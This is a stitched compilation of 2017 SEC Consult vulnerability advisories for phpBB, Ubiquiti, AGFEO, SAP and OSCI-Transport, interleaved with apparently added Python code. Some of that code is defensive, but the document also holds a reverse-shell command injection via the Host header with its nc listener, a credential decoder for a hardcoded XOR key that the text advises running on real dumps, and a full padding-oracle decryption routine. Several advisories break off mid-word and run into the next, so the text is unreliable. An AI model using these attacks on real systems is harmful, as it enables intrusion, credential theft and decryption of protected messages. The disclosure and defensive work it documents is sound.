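        guid = secrets.token_hex(16)
        self.issued_guids.add(guid)
        return encode_param(candidate_id, guid)

    def confirm(self, param):
        p = decode_param(param)
        if p["corr_act_guid"] in self.issued_guids:
            self.confirmed.add(int(p["candidate_hrobject"]))
            return True
        return False


class FixedRegistry:
    """GUID is a one-time nonce bound to exactly one candidate_hrobject."""
    def __init__(self):
        self.pending = {}          # candidate_id -> guid issued for it
        self.confirmed = set()

    def register(self, candidate_id):
        guid = secrets.token_hex(16)
        self.pending[candidate_id] = guid
        return encode_param(candidate_id, guid)

    def confirm(self, param):
        p = decode_param(param)
        cid = int(p["candidate_hrobject"])
        expected = self.pending.get(cid)
        if expected is not None and hmac.compare_digest(
                expected.encode(), p["corr_act_guid"].encode()):
            self.confirmed.add(cid)
            del self.pending[cid]   # single use
            return True
        return False


def run_attack(registry_cls):
    """Return True if the attacker manages to confirm the victim's registration."""
    reg = registry_cls()
    attacker_link = reg.register(1000)   # step 1: attacker's own address
    reg.register(1001)                   # step 2: victim's address, link goes to victim
    reg.confirm(attacker_link)           # attacker confirms his own registration
    return any(reg.confirm(p) for p in forged_params(attacker_link))   # steps 3-6
```

Constructed candidate IDs 1000/1001 stand in for the incremental candidate_hrobject values. The fix is not a longer GUID but the binding: the verifier must look the nonce up by the registration it belongs to and invalidate it after use.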
Vulnerable / tested versions:
-
The vulnerability was found in the following release of E-Recruiting (ERECRUIT):
Release: 617
According to the vendor, the following versions are affected:
Release: 605, 606, 616, 617
Vendor contact timeline:
2017-07-12: Contacted vendor via encrypted email with vulnerability description and Responsible Disclosure Policy attached at sec...@sap.com
2017-07-13: Vendor confirmed the receipt of the email
2017-07-25: Vendor confirmed the vulnerability
2017-07-31: Contacted vendor to ask for patch release date and versions affected
2017-08-01: Vendor stated they are working on the fix and requested "adequate time". Link to SAP Responsible Disclosure Policy was provided.
2017-08-01: Discussing release date, requested planned patch release date and versions affected.
2017-08-02: Vendor stated that the patch cannot be published until 2017-08-31 and requested more time before advisory publication.
2017-08-23: Contacted vendor to request current patch status, planne
SEC Consult SA-20170804-0 :: phpBB Server Side Request Forgery (SSRF) vulnerability
SEC Consult Vulnerability Lab Security Advisory < 20170804-0 >
===
title: Server Side Request Forgery Vulnerability
product: phpBB
vulnerable version: 3.2.0
fixed version: 3.2.1
CVE number:
impact: Medium
homepage: https://www.phpbb.com/
found: 2017-05-21
by: Jasveer Singh (Office Kuala Lumpur)
SEC Consult Vulnerability Lab
An integrated part of SEC Consult
Bangkok - Berlin - Linz - Luxembourg - Montreal - Moscow
Kuala Lumpur - Singapore - Vienna (HQ) - Vilnius - Zurich
https://www.sec-consult.com
===
Vendor description:
---
"phpBB is a free flat-forum bulletin board software solution that can be used to stay in touch with a group of people or can power your entire website. With an extensive database of user-created extensions and styles database containing hundreds of style and image packages to customise your board, you can create a very unique forum in minutes."
Source: https://www.phpbb.com/
Business recommendation:
The patch should be installed immediately. Furthermore, SEC Consult recommends performing a thorough security review of this software.
Vulnerability overview/description:
---
The phpBB forum software is vulnerable to server side request forgery (SSRF). Via the web application's "Remote Avatar" function an attacker is able to perform port scanning, request internal content and potentially attack such internal services.
Proof of concept:
-
This vulnerability can be exploited by an attacker with a registered account; a normal, low-privileged account is sufficient. If the web application has remote avatars enabled, this feature can be abused by an attacker to perform port scanning, since the server fetches the supplied URL itself and its response differs depending on whether the target port answers. The following request triggers the SSRF:
URL : http://$DOMAIN/ucp.php?i=ucp_profile=avatar
METHOD : POST
PARAMETER : avatar_remote_url
PAYLOAD : http://$DOMAIN:$PORT/x.jpg
Vulnerable / tested versions:
-
phpBB version 3.2.0 has been tested. This version was the latest at the time the security vulnerability was discovered.
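The defensive side of the remote-avatar fetch, as an added example that is not phpBB's code: a URL check that only lets the server fetch from public addresses on the standard web ports, which removes the port-scanning and internal-host reach described above. The `resolver` argument is injectable so the check runs offline in a test; the hostname/address values below are constructed. Every address a name resolves to must be public, because DNS may return several.

```python
import ipaddress
import socket
from urllib.parse import urlsplit

ALLOWED_SCHEMES = {"http", "https"}
ALLOWED_PORTS = {80, 443}


def _is_public_ip(ip):
    # is_global is False for loopback, RFC1918, link-local, multicast,
    # unspecified and the documentation/test ranges.
    return ipaddress.ip_address(ip).is_global


def is_safe_remote_avatar_url(url, resolver=socket.gethostbyname_ex):
    """Return True only if fetching `url` server-side cannot reach an
    internal host or a non-web port."""
    parts = urlsplit(url)
    if parts.scheme not in ALLOWED_SCHEMES or not parts.hostname:
        return False
    if parts.username or parts.password:        # http://user@10.0.0.1/ style tricks
        return False
    try:
        port = parts.port
    except ValueError:                           # "http://host:abc/"
        return False
    if port is None:
        port = 443 if parts.scheme == "https" else 80
    if port not in ALLOWED_PORTS:                # an avatar has no business on 8080, 22, ...
        return False
    host = parts.hostname
    try:                                         # literal IPv4/IPv6 address?
        return _is_public_ip(host)
    except ValueError:
        pass
    try:
        _, _, addrs = resolver(host)
    except OSError:                              # socket.gaierror is an OSError
        return False
    return bool(addrs) and all(_is_public_ip(a) for a in addrs)
```

Two caveats a reviewer would raise: the address list is checked before the fetch, so a name that rebinds to an internal address between check and fetch still wins (pin the resolved address when connecting), and HTTP redirects from the fetched URL must be re-validated with the same function or not followed at all.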
Vendor contact timeline:
2017-05-23: Contacting vendor through security bug tracker.
2017-05-29: Vendor confirms the vulnerability and is working on a fix.
2017-07-12: Vendor requests a 5-day extension of the deadline from the latest possible release date.
2017-07-17: Patch released by the vendor.
2017-08-04: Public release of the advisory.
Solution:
-
Upgrade to phpBB 3.2.1
For further information see:
https://www.phpbb.com/community/viewtopic.php?f=14=14782136
Workaround:
---
Advisory URL:
-
https://www.sec-consult.com/en/Vulnerability-Lab/Advisories.htm
~~~~~~~~~~~
SEC Consult Vulnerability Lab
SEC Consult
Bangkok - Berlin - Linz - Luxembourg - Montreal - Moscow
Kuala Lumpur - Singapore - Vienna (HQ) - Vilnius - Zurich
About SEC Consult Vulnerability Lab
The SEC Consult Vulnerability Lab is an integrated part of SEC Consult. It ensures the continued knowledge gain of SEC Consult in the field of network and application security to stay ahead of the attacker. The SEC Consult Vulnerability Lab supports high-quality penetration testing and the evaluation of new offensive and defensive technologies for our customers. Hence our customers obtain the most current information about vulnerabilities and valid recommendations about the risk profile of new technologies.
~~~
Interested to work with the experts of SEC Consult? Send us your application https://www.sec-consult.com/en/Career.htm
Interested in improving your cyber security with the experts of SEC Consult? Contact our local offices https://www.sec-consult.com/en/About/Contact.htm
~~~
Mail: research at sec-consult dot com
Web: https://www.sec-consult.com
Blog: http://blog.sec-consult.com
Twitter: https://twitter.com/sec_consult
EOF Jasveer Singh / @2017
SEC Consult SA-20170804-1 :: Ubiquiti Networks UniFi Cloud Key authenticated command injection
SEC Consult Vulnerability Lab Security Advisory < 20170804-1 >
===
title: Authenticated Command Injection
product: Ubiquiti Networks UniFi Cloud Key
vulnerable version: Firmware v0.6.1
fixed version: Firmware v0.6.4
CVE number:
impact: High
homepage: https://www.ubnt.com
found: 2017-03-26
by: T. Weber (Office Vienna)
SEC Consult Vulnerability Lab
An integrated part of SEC Consult
Bangkok - Berlin - Linz - Luxembourg - Montreal - Moscow
Kuala Lumpur - Singapore - Vienna (HQ) - Vilnius - Zurich
https://www.sec-consult.com
===
Vendor description:
---
"Ubiquiti Networks develops high-performance networking technology for service providers and enterprises. Our technology platforms focus on delivering highly advanced and easily deployable solutions that appeal to a global customer base in underserved and underpenetrated markets."
Source: http://ir.ubnt.com/
Business recommendation:
SEC Consult recommends not to use this device in production until a thorough security review has been performed by security professionals and all identified issues have been resolved.
Vulnerability overview/description:
---
A command injection can be triggered via the Host header of the GET request to the status API. This vulnerability can be exploited when the Cloud Key web interface is exposed to the Internet and an attacker has credentials for it.
Proof of concept:
-
The following PHP snippet is responsible for the command execution vulnerability: (api.inc, line 265)
---
[...]
function is_unifi_running() {
    if (!isset($_SERVER['HTTP_HOST'])) {
        $c_host = $_SERVER['SERVER_ADDR'];
    } else {
        $c_host = $_SERVER['HTTP_HOST'];
    }
    $unifi_href = 'http://' . $c_host . ':8080/status';
    exec(CMD_CURL . $unifi_href, $out, $rc);
    if ($rc == 0) {
        return true;
    }
    return false;
}
[...]
---
'$c_host' is taken straight from the client-controlled Host header and concatenated into a string that exec() hands to a shell, so a ';' in the header terminates the curl command and starts an attacker-chosen one.
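To make the shell's view of the concatenated command visible, and to show the fix, here is an added example in Python (not the Cloud Key's PHP and not part of the advisory). `vulnerable_command_line` mirrors the string `is_unifi_running()` builds; `shell_commands` tokenises it the way a POSIX shell would and returns the separate commands it would run; `hardened_command` validates the Host header against a strict host[:port] grammar and builds an argv list that never touches a shell. The value of the PHP constant CMD_CURL is not on the page and is assumed; the injected header value is the one from the reverse-shell request in this advisory.

```python
import re
import shlex
import subprocess

CMD_CURL = "curl -s -o /dev/null "      # assumed value of the PHP constant CMD_CURL

# Constructed Host header values: a benign one and the advisory's injected one.
SAFE_HOST = "192.168.0.30"
INJECTED_HOST = "192.168.0.30;busybox nc 192.168.0.3 8999 -e bash;"


def vulnerable_command_line(host_header):
    """String exec() would pass to /bin/sh in the vulnerable PHP."""
    return CMD_CURL + "http://" + host_header + ":8080/status"


def shell_commands(cmdline):
    """Split like a POSIX shell, with ';' as a command separator, and return
    the list of argv lists the shell would execute one after another."""
    lex = shlex.shlex(cmdline, posix=True, punctuation_chars=";")
    lex.whitespace_split = True
    cmds, cur = [], []
    for tok in lex:
        if tok == ";":
            if cur:
                cmds.append(cur)
            cur = []
        else:
            cur.append(tok)
    if cur:
        cmds.append(cur)
    return cmds


# host[:port] only: DNS labels or dotted IPv4, optional numeric port.
# No character of this grammar has meaning to a shell. (IPv6 literals in
# brackets are deliberately not accepted here.)
_HOST_RE = re.compile(
    r"^(?:[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?\.?)+(?::\d{1,5})?$")


def host_header_is_valid(host_header):
    return _HOST_RE.fullmatch(host_header) is not None


def hardened_command(host_header):
    """Validate first, then build an argv list: subprocess.run(argv) with the
    default shell=False execs curl directly, so no separator is interpreted."""
    if not host_header_is_valid(host_header):
        raise ValueError("invalid Host header")
    host = host_header.split(":")[0]             # the client must not pick the port either
    return ["curl", "-s", "-o", "/dev/null", "http://" + host + ":8080/status"]


def is_unifi_running(host_header):
    """Hardened counterpart of the PHP function."""
    rc = subprocess.run(hardened_command(host_header), capture_output=True).returncode
    return rc == 0
```

The argv form is the real fix; the regex only narrows the input further. The PHP equivalent is to validate `$c_host` the same way and pass it through `escapeshellarg()` (or, better, to talk to 127.0.0.1:8080 directly instead of trusting the Host header at all, since the controller runs on the same box).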
The following GET request was used to open a reverse shell via command injection from the Cloud Key system (192.168.0.30) to the attacker (192.168.0.3):
---
GET /api/status HTTP/1.1
Host: 192.168.0.30;busybox nc 192.168.0.3 8999 -e bash;
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
Accept: application/json, text/plain, */*
Accept-Language: en-US,en;q=0.5
X-Access-Token:
Referer: https://192.168.0.30/login
Cookie: CKSESSIONID=
Connection: close
---
As the listener, netcat was used:
$ nc -lvp 8999
Vulnerable / tested versions:
-
Ubiquiti Networks UniFi Cloud Key version 0.6.1 has been tested. This version was the latest at the time the security vulnerabilities were discovered.
Vendor contact timeline:
2017-03-29: Contacting vendor via HackerOne. Vendor sets status to "Triaged".
2017-04-24: Asking for a status update; no answer.
2017-05-06: Found update 0.6.4 on the website of the vendor.
2017-05-15: Contacted vendor via e-mail and asked for status.
2017-05-16: Vendor closed the ticket and changed the status to resolved. Current firmware version was v0.6.4. Set the publication date to 2017-08-04 (at least 90 days after fix).
2017-08-04: Public release of security advisory
Solution:
-
Upgrade to v0.6.4 or above.
Workaround:
---
None
Advisory URL:
-
https://www.sec-consult.com/en/Vulnerability-Lab/Advisories.htm
SEC Consult SA-20170724-0 :: Cross-Site Scripting (XSS) issue in multiple Ubiquiti Networks products
SEC Consult Vulnerability Lab Security Advisory < 20170724-0 >
===
title: Cross-Site Scripting (XSS)
product: Ubiquiti Networks EP-R6, ER-X, ER-X-SFP
vulnerable version: Firmware v1.9.1
fixed version: Firmware v1.9.1.1
CVE number:
impact: Medium
homepage: https://www.ubnt.com
found: 2017-04-04
by: R. Freingruber, T. Weber (Office Vienna)
SEC Consult Vulnerability Lab
An integrated part of SEC Consult
Bangkok - Berlin - Linz - Montreal - Moscow
Singapore - Vienna (HQ) - Vilnius - Zurich
https://www.sec-consult.com
===
Vendor description:
---
"Ubiquiti Networks develops high-performance networking technology for service providers and enterprises. Our technology platforms focus on delivering highly advanced and easily deployable solutions that appeal to a global customer base in underserved and underpenetrated markets."
Source: http://ir.ubnt.com/
Business recommendation:
SEC Consult recommends not to use this device in production until a thorough security review has been performed by security professionals and all identified issues have been resolved.
Vulnerability overview/description:
---
1) Reflected Cross Site Scripting (XSS) in Internet Explorer
This vulnerability can be exploited by deactivating or bypassing the integrated XSS filter of Internet Explorer. A reflected cross site scripting vulnerability was identified because of an initialization error in "/files/index/". An attacker can exploit this vulnerability by tricking a victim into visiting a malicious website. The attacker is then able to hijack the session of the attacked user. If the user is currently not logged in, the injected JavaScript code can start a brute-force attack (for example, with the default credentials ubnt:ubnt). After a session has been established, the code has full control over the system via the CLI feature, which is basically a shell wrapper. By abusing this vulnerability an attacker can open ports on the router or start a reverse shell.
Proof of concept:
-
1) Reflected Cross Site Scripting (XSS) in Internet Explorer
The following URL can be used as PoC:
https://192.168.1.1/files/index/0/aaa
SEC Consult SA-20170724-1 :: Open Redirect issue in multiple Ubiquiti Networks products
SEC Consult Vulnerability Lab Security Advisory < 20170724-1 >
===
title: Open Redirect in Login Page
product: Multiple Ubiquiti Networks products, e.g. TS-16-CARRIER, TS-5-POE, TS-8-PRO, AG-HP-2G16, AG-HP-2G20, AG-HP-5G23, AG-HP-5G27, AirGrid M, AirGrid M2, AirGrid M5, AR, AR-HP, BM2HP, BM2-Ti, BM5HP, BM5-Ti, LiteStation M5, locoM2, locoM5, locoM9, M2, M3, M365, M5, M900, NB-2G18, NB-5G22, NB-5G25, NBM3, NBM365, NBM9, NSM2, NSM3, NSM365, NSM5, PBM10, PBM3, PBM365, PBM5, PICOM2HP, Power AP N
vulnerable version: AirOS 6.0.1 (XM), 1.3.4 (SW)
fixed version: AirOS 6.0.3 (XM), 1.3.5 (SW)
CVE number:
impact: Low
homepage: https://www.ubnt.com/
found: 2017-03-22
by: T. Weber (Office Vienna)
SEC Consult Vulnerability Lab
An integrated part of SEC Consult
Bangkok - Berlin - Linz - Montreal - Moscow
Singapore - Vienna (HQ) - Vilnius - Zurich
https://www.sec-consult.com
===
Vendor description:
---
"Ubiquiti Networks develops high-performance networking technology for service providers and enterprises. Our technology platforms focus on delivering highly advanced and easily deployable solutions that appeal to a global customer base in underserved and underpenetrated markets."
Source: http://ir.ubnt.com/
Business recommendation:
SEC Consult recommends not to use the devices in production until a thorough security review has been performed by security professionals and all identified issues have been resolved.
Vulnerability overview/description:
---
1) Open Redirect in Login Page - HackerOne #158287
An open redirect vulnerability can be triggered by luring an attacked user into authenticating to a Ubiquiti AirOS device via a crafted link. This vulnerability was found earlier by another bug bounty participant on HackerOne. It was numbered #158287.
Proof of concept:
-
http:///login.cgi?uri=https://www.sec-consult.com
After a successful login, the user is redirected to https://www.sec-consult.com, because the "uri" parameter is used as the post-login target without checking that it points back to the device itself.
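The check the login page lacks, as an added example that is not AirOS code and not part of the advisory: a validator for a post-login "uri" parameter that accepts only a path on the same device. Besides the plain absolute URL from the PoC it also rejects the usual bypasses of naive "must start with /" checks: protocol-relative `//host`, the backslash variant `/\host` that browsers normalise to `//host`, percent-encoded slashes, and control characters that browsers strip before parsing. All test URLs are constructed.

```python
from urllib.parse import unquote, urlsplit


def is_safe_local_redirect(uri):
    """Return True only for a same-device path such as "/index.cgi?x=1".
    Anything a browser could interpret as another origin is rejected."""
    if not uri:
        return False
    target = unquote(uri)                        # defeat %2F%2Fevil.example
    if any(ord(c) < 0x20 or ord(c) == 0x7F for c in target):
        return False                             # browsers drop \t \r \n before parsing
    if not target.startswith("/"):
        return False                             # absolute URLs, "javascript:", relative junk
    if target.startswith(("//", "/\\")):
        return False                             # scheme-relative: //evil.example, /\evil.example
    parts = urlsplit(target)
    return parts.scheme == "" and parts.netloc == ""


def post_login_target(uri, default="/index.cgi"):
    """What the login handler should redirect to after a successful login."""
    return uri if is_safe_local_redirect(uri) else default
```

A stricter alternative that avoids parsing altogether is an allow-list of known landing pages on the device; the validator above is the general form when the target is genuinely dynamic.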
Vulnerable / tested versions:
-
Ubiquiti Networks AirRouter (v6.0.1)
Ubiquiti Networks TS-8-PRO (v1.3.4)
Based on information embedded in the firmware of other Ubiquiti products gathered with our IoT Inspector tool, we believe the following devices are affected as well:
Ubiquiti Networks LBE-M5-23 (Version: XW v6.0.1)
Ubiquiti Networks NBE-M2-13 (Version: XW v6.0.1)
Ubiquiti Networks NBE-M5-16 (Version: XW v6.0.1)
Ubiquiti Networks NBE-M5-19 (Version: XW v6.0.1)
Ubiquiti Networks PBE-M2-400 (Version: XW v6.0.1)
Ubiquiti Networks PBE-M5-300 (Version: XW v6.0.1)
Ubiquiti Networks PBE-M5-300-ISO (Version: XW v6.0.1)
Ubiquiti Networks PBE-M5-400 (Version: XW v6.0.1)
Ubiquiti Networks PBE-M5-400-ISO (Version: XW v6.0.1)
Ubiquiti Networks PBE-M5-620 (Version: XW v6.0.1)
Ubiquiti Networks RM2-Ti (Version: XW v6.0.1)
Ubiquiti Networks RM5-Ti (Version: XW v6.0.1)
Vendor contact timeline:
2017-03-22: Contacting vendor via HackerOne.
2017-03-22: Vendor marked open redirect as duplicate of #158287. The contact also states that this issue will be resolved in the next release.
2017-05-05: Found updates (6.0.3 and 1.3.5) on the website of the vendor and confirmed the fix; provide at least 90 days for customers to apply the patch.
2017-05-15: Contacted vendor via e-mail and set the publication date to 2017-07-24.
2017-07-24: Public release of security advisory
Solution:
-
Upgrade to firmware version 6.0.3 (XM), 1.3.5 (SW) or later.
Workaround:
---
No workaround
Advisory URL:
-
https://www.sec-consult.com/en/Vulnerability-Lab/Advisories.htm
SEC Consult SA-20170712-0 :: Multiple critical vulnerabilities in AGFEO smart home ES 5xx/6xx products
SEC Consult Vulnerability Lab Security Advisory < 20170712-0 >
===
title: Multiple critical vulnerabilities
product: AGFEO Smart Home ES 5xx
         AGFEO Smart Home ES 6xx
vulnerable version: at least 1.9b, 1.10
fixed version: 1.12c
CVE number: -
impact: Critical
homepage: https://www.agfeo.de/
found: 2016-12-28
by: T. Weber (Office Vienna)
SEC Consult Vulnerability Lab
An integrated part of SEC Consult
Bangkok - Berlin - Linz - Luxembourg - Montreal - Moscow
Kuala Lumpur - Singapore - Vienna (HQ) - Vilnius - Zurich
https://www.sec-consult.com
===
Vendor description:
---
AGFEO GmbH & Co. KG is a vendor of telephone systems and other (tele-)communication products such as DECT phones, headsets and smart home products.
Business recommendation:
The available patches should be installed immediately. SEC Consult recommends not to use this product in a production environment until a thorough security review has been performed by security professionals, as there are indications of further security issues.
Vulnerability overview/description:
---
1) Unauthenticated access to web services and authentication bypass
A web service with multiple scripts for debug purposes is accessible on an unusual port on the device. There is also a script to read files from the filesystem. As the web service runs with root privileges, all files on the operating system can be read by an attacker. This only affects the ES 5xx product line; all other vulnerabilities affect both ES 5xx and 6xx.
The configuration of the device can be changed and arbitrary updates can be uploaded, as well as music files for the answering machine. By reading the database content, the usernames and their passwords can be revealed and easily decrypted. This way the administrator password can be dumped from the database and the device can be fully administrated by an attacker.
The normal user interface has an additional development subfolder which was probably used during the development process.
Updates can be triggered from this sub platform, and log files, statistics and states can also be displayed.
2) Unauthenticated access to configuration ports
Multiple different instances of TCP services are present on the device. Each of the listening sockets is forked from a debug and configuration service. Internal device information can be read from the device. Among other commands, the configuration of the device can also be altered by using these services.
3) Hardcoded cryptographic keys
Three certificates including their private keys are embedded in the firmware of AGFEO ES 5xx/6xx SmartHome products. The certificates and keys in both product lines are exactly the same. One certificate is used for HTTPS (default server certificate for web based configuration and management). Impersonation, man-in-the-middle or passive decryption attacks are possible. These attacks allow an attacker to gain access to sensitive information like admin credentials and use them in further attacks.
4) Multiple reflected cross site scripting (XSS) vulnerabilities
The ES 5xx SmartHome products are vulnerable to reflected cross site scripting. Malicious JavaScript code can be executed in the browser of a victim by luring the victim to a crafted link. This is possible even if the victim is not logged in. It is assumed that the 6xx products are affected as well, but those could not be tested.
Proof of concept:
-
1) Unauthenticated access to web services and authentication bypass
The debug web service is available at the following URL:
http://:20011/index.html
Different scripts are accessible; the following actions can be executed:
-) Change IP configuration
-) Change time zone
-) Upload updates (any file can be uploaded to the device!)
-) Read all files on the filesystem
-) Play, delete and move voice messages on all mail boxes
-) Convert mp3 files to wav files
-) List all connected phones and the related numbers
The SQLite database is located under "/home/profile/poolstore.db".
By reading this file the usernames and passwords can be dumped. The passwords are XOR-encrypted and the result is base64-encoded. To decrypt the XOR'ed password the following fixed key has to be used:
"0x42 0xab 0xce 0xfa 0x54 0xed 0xcf 0xba"
The function to decrypt the password was found in the PHP script "login.php":
function decodePassword($PasswordEnc) {
    $PasswordBinaryEncBase64 = "";
    $PasswordBinaryEnc = "";
    $PasswordBinary = array();
    $Password = "
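The decoding described above, as an added example in Python (this is not the device's login.php and not part of the advisory): base64-decode the stored value, then XOR it with the repeating eight-byte key quoted in the advisory. The sample rows are constructed; `encode_password` exists only to build them, XOR being its own inverse. `recover_key` shows why a fixed XOR key is not encryption at all: one known password of eight or more characters yields the whole key, so an attacker would not even need to read login.php.

```python
import base64

# Fixed key from the advisory (login.php, decodePassword)
KEY = bytes([0x42, 0xab, 0xce, 0xfa, 0x54, 0xed, 0xcf, 0xba])


def xor_with_key(data, key=KEY):
    """XOR `data` with `key`, repeating the key as needed."""
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))


def decode_password(password_enc):
    """poolstore.db value -> cleartext: base64-decode, then XOR with KEY."""
    return xor_with_key(base64.b64decode(password_enc)).decode("latin-1")


def encode_password(password):
    """Inverse of decode_password; used here only to build constructed samples."""
    return base64.b64encode(xor_with_key(password.encode("latin-1"))).decode()


def recover_key(known_password, password_enc):
    """Known-plaintext attack: ciphertext XOR plaintext gives the key bytes."""
    ct = base64.b64decode(password_enc)
    pt = known_password.encode("latin-1")
    return bytes(c ^ p for c, p in zip(ct, pt))[:len(KEY)]


# Constructed rows in the shape of (username, stored password) from the users table
SAMPLE_ROWS = [
    ("admin", encode_password("Sup3rSecret")),
    ("user", encode_password("hunter2")),
]


def dump_credentials(rows=SAMPLE_ROWS):
    """Return [(username, cleartext password), ...] for dumped rows."""
    return [(user, decode_password(enc)) for user, enc in rows]
```

Against a real dump, replace SAMPLE_ROWS with the rows read from /home/profile/poolstore.db via the file-read script; the "latin-1" decoding keeps every byte value representable, which matters if a password contains non-ASCII characters.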
SEC Consult SA-20170630-0 :: Multiple critical vulnerabilities in OSCI-Transport library 1.2 for German e-Government
We have published an accompanying blog post to this technical advisory with further information:
German version with less technical details as an overview:
http://blog.sec-consult.com/2017/06/e-government-in-deutschland-schwachstellen.html
English version containing more detailed attack scenario descriptions:
http://blog.sec-consult.com/2017/06/german-e-government-details-vulnerabilities.html
SEC Consult Vulnerability Lab Security Advisory < 20170630-0 >
===
title: Multiple critical vulnerabilities
product: OSCI-Transport library 1.2 for German e-Government
vulnerable version: 1.6.1
fixed version: 1.7.1
CVE number: CVE-2017-10668 (Padding Oracle)
            CVE-2017-10669 (Signature Wrapping)
            CVE-2017-10670 (XXE)
impact: Critical
homepage: http://www.xoev.de
found: 01/2017
by: Wolfgang Ettlinger (Office Vienna)
    Marc Nimmerrichter (Office Vienna)
SEC Consult Vulnerability Lab
An integrated part of SEC Consult
Bangkok - Berlin - Linz - Luxembourg - Montreal - Moscow
Kuala Lumpur - Singapore - Vienna (HQ) - Vilnius - Zurich
https://www.sec-consult.com
===
Vendor description:
---
"The specification of the OSCI-Transport protocol in version 1.2 describes a secure, vendor-independent and interoperable data exchange format. To ease implementation for users in public administration as well as for vendors of specialised applications, the OSCI 1.2 library is offered: the library implements OSCI-Transport version 1.2 and is therefore independent of domain-specific content. It is part of the OSCI-Transport infrastructure. The OSCI-Transport library is intended to be integrated into specialised applications (on the administration side) or client systems (on the citizen side)."
URL: http://www.xoev.de/die_standards/osci_transport/osci_transport_1_2/osci_1_2_bibliothek-2310
Business recommendation:
During a short security test, SEC Consult found several severe security vulnerabilities in the OSCI 1.2 Transport library.
The OSCI 1.2 Transport library is intended to provide a secure message exchange channel over an untrusted network (i.e. the Internet) for German government agencies for eGovernment. However, SEC Consult found that multiple vulnerabilities allow attackers to decrypt encrypted messages as well as modify signed messages. Moreover, a vulnerability can be used to read arbitrary files from any host that implements the OSCI 1.2 transport protocol using this library.
SEC Consult recommends KoSIT and its partners to _immediately_ stop using the OSCI 1.2 Transport library over untrusted networks. Moreover, a forensic investigation should be conducted on all affected systems to investigate whether the vulnerabilities have been exploited in the past. The library should only be used again after a thorough source code security review has been conducted and all vulnerabilities have been fixed. It is quite likely that further vulnerabilities exist, as there are indications of potential XML injection flaws.
Vulnerability overview/description:
---
1) External Entity Injection (XXE) [CVE-2017-10670]
By sending manipulated XML data to any communication partner, an attacker is able to conduct an XXE attack on the receiving system. This attack allows an attacker to read arbitrary files from the file system of the victim host or to conduct a denial of service attack.
2) Padding Oracle Attack [CVE-2017-10668]
The OSCI 1.2 Transport library only supports the following encryption algorithms:
* http://www.w3.org/2001/04/xmlenc#tripledes-cbc
* http://www.w3.org/2001/04/xmlenc#aes128-cbc
* http://www.w3.org/2001/04/xmlenc#aes192-cbc
* http://www.w3.org/2001/04/xmlenc#aes256-cbc
All of these algorithms are no longer recommended by the W3C:
"Note: Use of AES GCM is strongly recommended over any CBC block encryption algorithms as recent advances in cryptanalysis [...]
have cast doubt on the ability of CBC block encryption algorithms to protect plain text when used with XML Encryption" (https://www.w3.org/TR/xmlenc-core1/)
Since the supported cipher modes provide no integrity protection (CBC ciphertext is malleable: flipping a bit in one block flips the same bit in the next plaintext block) and the library reveals in an error message whether decryption failed (error code 9202), SEC Consult was able to conduct a padding oracle attack. An attacker who can submit modified ciphertexts and observe that error therefore learns, one byte at a time, whether a chosen modification produced valid padding, which is enough to recover the entire plaintext without the key. This attack allows an attacker to bypass the transport encryption.
3) Signature Wrapping attack [CVE-2017-10669]
By moving XML elements within the document tree, a signature wrapping attack can be conducted. This allows an attacker to modify the co
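The padding oracle attack of item 2, carried out end to end as an added example (not the OSCI library's code and not part of the advisory). The receiver is modelled by `padding_oracle`, which answers only "padding valid" or "padding invalid", the information error code 9202 leaks. AES/3DES are replaced by a small four-round Feistel network over SHA-256 so the block runs with the standard library alone; it is an invertible 16-byte block cipher and nothing more, and the attack does not depend on which block cipher sits under CBC. PKCS#7 padding is assumed (XML Encryption's CBC padding has the same last-byte-is-length structure). The key, IV and message are constructed.

```python
import hashlib

BLOCK = 16
PLAINTEXT = b"Vertrauliche OSCI-Nachricht"            # constructed sample message
KEY = hashlib.sha256(b"constructed demo key").digest()[:16]
IV = bytes(range(16))


def _xor(a, b):
    return bytes(x ^ y for x, y in zip(a, b))


def _f(key, half, r):
    """Feistel round function: keyed SHA-256, truncated to the 8-byte half."""
    return hashlib.sha256(key + bytes([r]) + half).digest()[:8]


def block_encrypt(key, blk):
    """Toy 16-byte block cipher (stand-in for AES/3DES, NOT for real use)."""
    l, r_ = blk[:8], blk[8:]
    for r in range(4):
        l, r_ = r_, _xor(l, _f(key, r_, r))
    return l + r_


def block_decrypt(key, blk):
    l, r_ = blk[:8], blk[8:]
    for r in reversed(range(4)):
        l, r_ = _xor(r_, _f(key, l, r)), l
    return l + r_


def pad(data):
    n = BLOCK - len(data) % BLOCK
    return data + bytes([n]) * n


def unpad(data):
    n = data[-1] if data else 0
    if not 1 <= n <= BLOCK or data[-n:] != bytes([n]) * n:
        raise ValueError("bad padding")          # what error 9202 reports
    return data[:-n]


def cbc_encrypt(key, iv, data):
    out, prev, padded = b"", iv, pad(data)
    for i in range(0, len(padded), BLOCK):
        prev = block_encrypt(key, _xor(padded[i:i + BLOCK], prev))
        out += prev
    return out


def cbc_decrypt_raw(key, iv, ct):
    out, prev = b"", iv
    for i in range(0, len(ct), BLOCK):
        blk = ct[i:i + BLOCK]
        out += _xor(block_decrypt(key, blk), prev)
        prev = blk
    return out


def padding_oracle(key, iv, ct):
    """The receiver as the attacker sees it: True unless unpadding fails."""
    try:
        unpad(cbc_decrypt_raw(key, iv, ct))
        return True
    except ValueError:
        return False


def recover_plaintext(oracle, iv, ct):
    """Recover the plaintext from the oracle alone, one byte per <= 256 queries.
    For each block C_n we forge the preceding block so the decrypted block ends
    in valid padding; that reveals block_decrypt(C_n), and XOR with the real
    preceding block gives the plaintext."""
    blocks = [iv] + [ct[i:i + BLOCK] for i in range(0, len(ct), BLOCK)]
    plain = b""
    for n in range(1, len(blocks)):
        prev, cur = blocks[n - 1], blocks[n]
        inter = bytearray(BLOCK)                 # block_decrypt(cur), recovered right to left
        for pos in range(BLOCK - 1, -1, -1):
            padv = BLOCK - pos                   # padding value we aim for (01, 02 02, ...)
            for guess in range(256):
                forged = bytearray(inter[j] ^ padv for j in range(BLOCK))
                forged[pos] = guess
                if not oracle(bytes(forged), cur):
                    continue
                if pos == BLOCK - 1:             # rule out an accidental 02 02 / 03 03 03 hit
                    forged[pos - 1] ^= 0xFF
                    if not oracle(bytes(forged), cur):
                        continue
                inter[pos] = guess ^ padv
                break
        plain += _xor(inter, prev)
    return unpad(plain)


def demo():
    """Encrypt the sample, then recover it using nothing but the oracle."""
    ct = cbc_encrypt(KEY, IV, PLAINTEXT)
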